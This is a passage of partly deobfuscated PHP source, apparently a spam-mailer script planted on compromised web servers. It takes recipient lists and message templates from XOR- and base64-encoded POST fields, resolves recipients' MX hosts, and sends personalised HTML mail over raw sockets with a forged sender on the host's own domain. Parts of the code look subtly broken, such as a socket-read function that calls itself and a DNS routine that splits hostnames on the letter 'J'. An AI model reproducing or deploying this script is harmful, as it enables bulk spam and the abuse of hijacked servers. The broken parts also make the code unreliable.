                        $emailDataList[$emailId]["l_done"]    = TRUE;
                        $emailDataList[$emailId]["l_way"]     = 1;
                    }
                    break;
                }
                break;
            case constant("STEP_QUIT"):
                if (prcux47($r76, $emailDataList, $emailId)) {
                    smtpCloseConnection($r76, $emailDataList, $emailId, "", FALSE);
                }
                break;
        }
    }
}
function rxrmp70($r76, &$emailDataList, $emailId)
{
    $errno = 0;
    $errstr = "";
    if ($emailDataList[$emailId]["s_trig"] == FALSE) {
        if (strlen($emailDataList[$emailId]["s_datain"]) != 0) {
            return TRUE;
        }
        return FALSE;
    }
    $data = read_socket_data($r76, $emailDataList[$emailId]["s_sock"], 4086, $errno, $errstr);
    if ($data == FALSE || $data == "") {
        if ($errno != 35 && $errno != 10035 && $errno != 11 && $errno != 10060) {
            smtpCloseConnection($r76, $emailDataList, $emailId, $errstr, FALSE);
            return FALSE;
        }
        if (strlen($emailDataList[$emailId]["s_datain"]) != 0) {
            return TRUE;
        }
        return FALSE;
    }
    $emailDataList[$emailId]["s_datain"] = $data;
    return FALSE;
}
function prcux47($r76, &$emailDataList, $emailId)
{
    $errno = 0;
    $errstr = "";
    if (strlen($emailDataList[$emailId]["s_dataout"]) == 0) {
        return TRUE;
    }
    $data = write_socket_data($r76, $emailDataList[$emailId]["s_sock"], $emailDataList[$emailId]["s_dataout"], $errno, $errstr);
    if ($data == FALSE) {
        if ($errno != 35 && $errno != 10035 && $errno != 11 && $errno != 10060) {
            smtpCloseConnection($r76, $emailDataList, $emailId, $errstr, FALSE);
        }
        return FALSE;
    }
    $emailDataList[$emailId]["s_dataout"] = substr($emailDataList[$emailId]["s_dataout"], $data);
    if (strlen($emailDataList[$emailId]["s_dataout"]) == 0) {
        return TRUE;
    }
    return FALSE;
}
function hasOpenedSockets($r76, &$emailDataList)
{
    $socketData = FALSE;
    if (constant("SOCKET_TYPE") != constant("SOCKET_TYPE_SOCKET")) {
        foreach (array_keys($emailDataList) as $emailId) {
            if ($emailDataList[$emailId]["l_smtp_end"] != TRUE) {
                $emailDataList[$emailId]["s_trig"] = TRUE;
                $socketData                    = TRUE;
            }
        }
        return $socketData;
    }
    $fwcsz21 = array();
    foreach (array_keys($emailDataList) as $emailId) {
        if ($emailDataList[$emailId]["l_smtp_end"] != TRUE) {
            if ($emailDataList[$emailId]["s_sock"] == 0 || $emailDataList[$emailId]["s_step"] == constant("STEP_CONNECT")) {
                $emailDataList[$emailId]["s_trig"] = TRUE;
            } else {
                $emailDataList[$emailId]["s_trig"] = FALSE;
                $fwcsz21[]                  = $emailDataList[$emailId]["s_sock"];
            }
            $socketData = TRUE;
        }
    }
    if (count($fwcsz21) == 0) {
        return $socketData;
    }
	// watch for changes to all opened sockets and updates the email list of sockets accordinly.
    $zkvhr54 = @socket_select($fwcsz21, $kllzd89 = NULL, $ccvhx50 = NULL, 0);
    if ($zkvhr54 == FALSE || $zkvhr54 == 0) {
        return $socketData;
    }
    foreach (array_keys($emailDataList) as $emailId) {
        $emailDataList[$emailId]["s_trig"] = FALSE;
        foreach ($fwcsz21 as $xoloh2) {
            if ($emailDataList[$emailId]["s_sock"] == $xoloh2) {
                $emailDataList[$emailId]["s_trig"] = TRUE;
                break;
            }
        }
    }
    return $socketData;
}
function determine_socket_type($r76, $foo)
{
    if (function_exists("socket_create") && function_exists("socket_connect") && function_exists("read_socket_data") && function_exists("socket_write")) {
        define("SOCKET_TYPE", constant("SOCKET_TYPE_SOCKET"));
        return TRUE;
    }
    if (function_exists("fsockopen")) {
        define("SOCKET_TYPE", constant("SOCKET_TYPE_FSOCKET"));
        return TRUE;
    }
    if (function_exists("stream_socket_client")) {
        define("SOCKET_TYPE", constant("SOCKET_TYPE_STREAM"));
        return TRUE;
    }
    define("SOCKET_TYPE", constant("SOCKET_TYPE_NO"));
    return FALSE;
}

function populateEmailData($r76, $recipientData, $senderEmailData, &$emailData)
{
    $qivuk92 = array();
    if (FALSE === @preg_match("/(.*?;)?(.*?;)?(.+@(.+)?);?/", $recipientData, $qivuk92)) {
        return FALSE;
    }
    if (!isset($qivuk92) || count($qivuk92) != 5) {
        return FALSE;
    }
    $emailData["g_namefirst"] = @ucfirst(str_replace(";", "", $qivuk92[1]));
    $emailData["g_namelast"]  = @ucfirst(str_replace(";", "", $qivuk92[2]));
    $emailData["g_mailto"]    = str_replace(";", "", $qivuk92[3]);
    $emailData["g_domainto"]  = str_replace(";", "", $qivuk92[4]);
    if (!isset($emailData["g_mailto"]) || $emailData["g_mailto"] == "") {
        return FALSE;
    }
    if (!isset($emailData["g_domainto"]) || $emailData["g_domainto"] == "") {
        return FALSE;
    }
    if (isset($emailData["g_namefirst"]) && $emailData["g_namefirst"] != "") {
        $emailData["g_mailto+"] = $emailData["g_namefirst"] . " " . $emailData["g_namelast"] . " <" . $emailData["g_mailto"] . ">";
    } else {
        $emailData["g_mailto+"] = $emailData["g_mailto"];
    }
    $emailData["g_domainfrom"] = $senderEmailData["hostFrom"];
    if (preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $senderEmailData["hostFrom"]) || @ini_get("safe_mode")) {
        $emailData["g_fff"] = FALSE;
    } else {
        $emailData["g_fff"] = TRUE;
    }
    $emailData["g_mailfrom"] = $senderEmailData["fromLogin"] . "@" . $senderEmailData["hostFrom"];
    if (isset($senderEmailData["fromName"]) && $senderEmailData["fromName"] != "") {
        $emailData["g_mailfrom+"] = $senderEmailData["fromName"] . " <" . $emailData["g_mailfrom"] . ">";
    } else {
        $emailData["g_mailfrom+"] = $emailData["g_mailfrom"];
    }
    $emailData["s_mxhost"]  = getMXHosts($r76, $emailData["g_domainto"]);
    $emailData["g_subject"] = @str_replace("%R_NAME%", $emailData["g_namefirst"], $senderEmailData["subjTempl"]);
    $emailData["g_subject"] = @str_replace("%R_LNAME%", $emailData["g_namelast"], $emailData["g_subject"]);
    $emailData["g_body"]    = @str_replace("%R_NAME%", $emailData["g_namefirst"], $senderEmailData["bodyTempl"]);
    $emailData["g_body"]    = @str_replace("%R_LNAME%", $emailData["g_namelast"], $emailData["g_body"]);
    $emailData["g_body"]    = @str_replace("%MAIL_EN%", encode_data($r76, $emailData["g_mailto"]), $emailData["g_body"]);
    $emailData["g_header"]  = "X-Priority: 3 (Normal)
";
    $emailData["g_header"] .= "MIME-Version: 1.0
";
    $emailData["g_header"] .= "Content-Type: text/html;
charset=\"iso-8859-1\"
";
    $emailData["g_header"] .= "Content-Transfer-Encoding: 8bit
";
    $emailData["g_headerfrom"] = "From: " . $emailData["g_mailfrom+"] . "
";
    $emailData["g_headerfrom"] .= "Reply-To:" . $emailData["g_mailfrom+"] . "
";
    $emailData["s_header"] = "Date: " . @date("D, j M Y G:i:s O") . "
";
    $emailData["s_header"] .= $emailData["g_headerfrom"];
    $emailData["s_header"] .= "Message-ID: <" . preg_replace("/(.{7})(.{5})(.{2}).*/", "$1-$2-$3", md5(time())) . "@" . $senderEmailData["hostFrom"] . ">
";
    $emailData["s_header"] .= "To: " . $emailData["g_mailto+"] . "
";
    $emailData["s_header"] .= "Subject: " . $emailData["g_subject"] . "
";
    $emailData["s_header"] .= $emailData["g_subject"];
    return TRUE;
}
function getMXHosts($r76, $hostname)
{
    $mlopr36 = array();
    $vcnaa29 = array();
    if (function_exists("getmxrr")) {
        @getmxrr($hostname, $mlopr36, $vcnaa29);
    } else {
        if (constant("SOCKET_TYPE") == constant("SOCKET_TYPE_NO")) {
            return FALSE;
        }
        $zkvhr54 = resolveDnsName($r76, $hostname, constant("DNS_TYPE_MX"));
        if ($zkvhr54 == FALSE || !isset($zkvhr54["ans"])) {
            return FALSE;
        }
        foreach ($zkvhr54["ans"] as $txows40) {
            if ($txows40["type"] == constant("DNS_TYPE_MX")) {
                $mlopr36[] = $txows40["data"];
                $vcnaa29[] = $txows40["preference"];
            }
        }
    }
    if (count($mlopr36) == 0) {
        return FALSE;
    }
    $wtqra76 = array_keys($vcnaa29, min($vcnaa29));
    return $mlopr36[$wtqra76[0]];
}
function getDataFromPost($r76, &$senderEmailData)
{
    if (count($_POST) < 2) {
        return FALSE;
    }
	
    $messageEncoded = false;
    $listPostKey = $dataPostKey = "";
    foreach (array_keys($_POST) as $key) {
        if ($key[0] == "l") {
            $listPostKey = $key;
        }
        if ($key[0] == "d") {
            $dataPostKey = $key;
        }
        if ($key[0] == "e") {
            $messageEncoded = true;
        }
    }
    if ($listPostKey == "" || $dataPostKey == "") {
        return FALSE;
    }
    $postedRecipients = getPostData($r76, $listPostKey, $messageEncoded);
    $postedData = getPostData($r76, $dataPostKey, $messageEncoded);
    if ($postedRecipients == FALSE || $postedData == FALSE) {
        return FALSE;
    }
    $senderEmailData["toList"]    = @preg_split("/#/", $postedRecipients);
    $senderEmailData["fromLogin"] = $senderEmailData["fromName"] = $senderEmailData["subjTempl"] = $senderEmailData["bodyTempl"] = "";
    $qivuk92             = array();
    if (FALSE !== @preg_match("/<USER>(.*?)<\/USER>/ism", $postedData, $qivuk92) && isset($qivuk92) && count($qivuk92) > 1) {
        $senderEmailData["fromLogin"] = $qivuk92[1];
    }
    if (FALSE !== @preg_match("/<NAME>(.*?)<\/NAME>/ism", $postedData, $qivuk92) && isset($qivuk92) && count($qivuk92) > 1) {
        $senderEmailData["fromName"] = $qivuk92[1];
    }
    if (FALSE !== @preg_match("/<SUBJ>(.*?)<\/SUBJ>/ism", $postedData, $qivuk92) && isset($qivuk92) && count($qivuk92) > 1) {
        $senderEmailData["subjTempl"] = $qivuk92[1];
    }
    if (FALSE !== @preg_match("/<SBODY>(.*?)<\/SBODY>/ism", $postedData, $qivuk92) && isset($qivuk92) && count($qivuk92) > 1) {
        $senderEmailData["bodyTempl"] = $qivuk92[1];
    }
    $senderEmailData["hostFrom"] = @preg_replace("/^(www|ftp)\./i", '', $_SERVER["HTTP_HOST"]);
    return TRUE;
}
function getPostData($r76, $postIndex, $messageEncoded)
{
    if (!isset($postIndex) || $postIndex == "") {
        return FALSE;
    }
    $message = @$_POST[$postIndex];
    if ($messageEncoded) {
        $message = messageDecode($r76, $message);
        for ($i = 0; $i < strlen($message); $i++) {
            $message[$i] = chr(ord($message[$i]) ^ 2);
        }
    }
    return urldecode(stripslashes($message));
}
function messageDecode($r76, $rxuwy6)
{
    $data = "";
    for ($i = 0; $i < 256; $i++) {
        $vefvn90[$i] = chr($i);
    }
    $adcpo58 = array_flip(preg_split("//", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/", -1, 1));
    $rfsny13 = array();
    preg_match_all("([A-z0-9+\/]{1,4})", $rxuwy6, $rfsny13);
    foreach ($rfsny13[0] as $dkpwg91) {
        $omqhl54 = 0;
        for ($i = 0; isset($dkpwg91[$i]); $i++) {
            $omqhl54 = ($omqhl54 << 6) + $adcpo58[$dkpwg91[$i]];
            if ($i > 0) {
                $data .= $vefvn90[$omqhl54 >> (4 - (2 * ($i - 1)))];
                $omqhl54 = $omqhl54 & (0xf >> (2 * ($i - 1)));
            }
        }
    }
    return $data;
}
function encode_data($r76, $input)
{
    for ($i = 0; $i < strlen($input); $i++) {
        $input[$i] = chr(ord($input[$i]) ^ 2);
    }
    return base64_encode($input);
}
function socketFactory($r76, $fsock, $socketProtocol, $address, $port, $timeout, &$errno, &$errstr, $nonblock = false)
{
    $protocol = "";
    $socketProtocol = NULL;
    $socketType  = NULL;
    $errno = 0;
    $errstr = "";
    if ($socketProtocol == constant("SOCKET_PROTO_TCP")) {
        $protocol = "tcp";
        $socketProtocol = SOL_TCP;
        $socketType  = SOCK_STREAM;
    } else if ($socketProtocol == constant("SOCKET_PROTO_UDP")) {
        $protocol = "udp";
        $socketType  = SOCK_DGRAM;
        $socketProtocol = SOL_UDP;
    } else {
        $errstr = "Error: invalid protocol";
        return FALSE;
    }
    switch (constant("SOCKET_TYPE")) {
        case constant("SOCKET_TYPE_SOCKET"):
            if ($fsock == FALSE) {
                $fsock = @socket_create(AF_INET, $socketType, $socketProtocol);
                if ($fsock == FALSE) {
                    $errno = socket_last_error();
                    $errstr = socket_strerror($errno);
                    break;
                }
                socket_set_option($fsock, SOL_SOCKET, SO_REUSEADDR, 1);
                socket_set_option($fsock, SOL_SOCKET, SO_RCVTIMEO, array(
                    "sec" => $timeout,
                    "usec" => 0
                ));
                socket_set_option($fsock, SOL_SOCKET, SO_SNDTIMEO, array(
                    "sec" => $timeout,
                    "usec" => 0
                ));
                if ($nonblock) {
                    socket_set_nonblock($fsock);
                }
            }
            if (!@socket_connect($fsock, $address, $port)) {
                $errno = socket_last_error($fsock);
                $errstr = socket_strerror($errno);
            }
            if ($nonblock) {
                socket_set_nonblock($fsock);
            }
            break;
        case constant("SOCKET_TYPE_FSOCKET"):
            $fsock = @fsockopen($protocol . "://" . $address, $port, $errno, $errstr, $timeout);
            if ($fsock && $nonblock) {
                @stream_set_blocking($fsock, 0);
            }
            @stream_set_timeout($fsock, $timeout);
            break;
        case constant("SOCKET_TYPE_STREAM"):
            $fsock = @stream_socket_client($protocol . "://" . $address . ":" . $port, $errno, $errstr, $timeout);
            if ($fsock && $nonblock) {
                @stream_set_blocking($fsock, 0);
            }
            @stream_set_timeout($fsock, $timeout);
            break;
        default:
            $errstr = "Error: invalid socket type";
            return FALSE;
    }
    return $fsock;
}
function close_connection($r76, &$fsock)
{
    if ($fsock == FALSE) {
        return;
    }
    if (constant("SOCKET_TYPE") == constant("SOCKET_TYPE_SOCKET")) {
        @socket_close($fsock);
    } else {
        @fclose($fsock);
    }
    $fsock = FALSE;
    return;
}
function read_socket_data($r76, $fsock, $bytesToRead, &$errno, &$errstr)
{
    if ($fsock == FALSE) {
        return FALSE;
    }
    if (constant("SOCKET_TYPE") == constant("SOCKET_TYPE_SOCKET")) {
        $socketData = @read_socket_data($fsock, $bytesToRead, PHP_BINARY_READ);
        if ($socketData == FALSE) {
            $errno = socket_last_error($fsock);
            $errstr = socket_strerror($errno);
        }
    } else {
        if (@feof($fsock)) {
            return FALSE;
        }
        $socketData = @fread($fsock, $bytesToRead);
        if (strlen($socketData) == 0) {
            $errno = 35;
        }
    }
    return $socketData;
}
function write_socket_data($r76, $fsock, $data, &$errno, &$errstr)
{
    if ($fsock == FALSE) {
        return FALSE;
    }
    if (constant("SOCKET_TYPE") == constant("SOCKET_TYPE_SOCKET")) {
        $socketData = @socket_write($fsock, $data);
        if ($socketData == FALSE) {
            $errno = socket_last_error($fsock);
            $errstr = socket_strerror($errno);
        }
    } else {
        if (@feof($fsock)) {
            return FALSE;
        }
        $socketData = @fwrite($fsock, $data);
    }
    return $socketData;
}
function wdtjf68($r76, $fsock, $timeout)
{
    if ($fsock == FALSE) {
        return FALSE;
    }
    if (constant("SOCKET_TYPE") == constant("SOCKET_TYPE_SOCKET")) {
        @socket_set_option($fsock, SOL_SOCKET, SO_RCVTIMEO, array(
            "sec" => $timeout,
            "usec" => 0
        ));
        @socket_set_option($fsock, SOL_SOCKET, SO_SNDTIMEO, array(
            "sec" => $timeout,
            "usec" => 0
        ));
    } else {
        @stream_set_timeout($fsock, $timeout);
    }
    return TRUE;
}
function resolveDnsName($r76, $hostname, $jvanz2)
{
    $errno = 0;
    $errstr = "";
    $fsock = socketFactory($r76, FALSE, constant("SOCKET_PROTO_UDP"), "8.8.8.8", 53, 10, $errno, $errstr);
    if (!$fsock) {
        return FALSE;
    }
    $lsxth41 = rand(0x0001, 0xFFFE);
    $uamee6  = explode("J", $hostname);
    $payload = pack("nnnnnn", $lsxth41, 0x0100, 0x0001, 0x0000, 0x0000, 0x0000);
    foreach ($uamee6 as $sahcc1) {
        $payload .= pack("Ca*", strlen($sahcc1), $sahcc1);
    }
    $payload .= pack("Cnn", 0x00, $jvanz2, 0x0001);
    $socketStatus = write_socket_data($r76, $fsock, $payload, $errno, $errstr);
    if (!$socketStatus || $socketStatus != strlen($payload)) {
        close_connection($r76, $fsock);
        return FALSE;
    }
    $dnsResponse = read_socket_data($r76, $fsock, 4086, $errno, $errstr);
    if ($dnsResponse == FALSE || strlen($dnsResponse) < 12) {
        close_connection($r76, $fsock);
        return FALSE;
    }
    $eynrg66 = unpack("ntid/nflags/nque/nans/nauth/nadd", substr($dnsResponse, 0, 12));
    $zjthw11 = 12;
    $dnsData = array(
        "header" => $eynrg66
    );
    for ($i = constant("DNS_STEP_QESTION"); $i <= constant("DNS_STEP_ADDITIONAL"); $i++) {
        $trxcp25 = '';
        switch ($i) {
            case constant("DNS_STEP_QESTION"):
                $trxcp25 = "que";
                break;
            case constant("DNS_STEP_ANSWER"):
                $trxcp25 = "ans";
                break;
            case constant("DNS_STEP_AUTHORITY"):
                $trxcp25 = "auth";
                break;
            case constant("DNS_STEP_ADDITIONAL"):
                $trxcp25 = "add";
                break;
        }
        for ($ybjpw87 = 0; $ybjpw87 < $eynrg66[$trxcp25]; $ybjpw87++) {
            $dnsRecordData["name"] = cgzhg7($r76, $zjthw11, $dnsResponse);
            if ($i == constant("DNS_STEP_QESTION")) {
                $dnsRecordData = array_merge($dnsRecordData, unpack("ntype/nclass", substr($dnsResponse, $zjthw11, 4)));
                $zjthw11 += 4;
            } else {
                $dnsRecordData = array_merge($dnsRecordData, unpack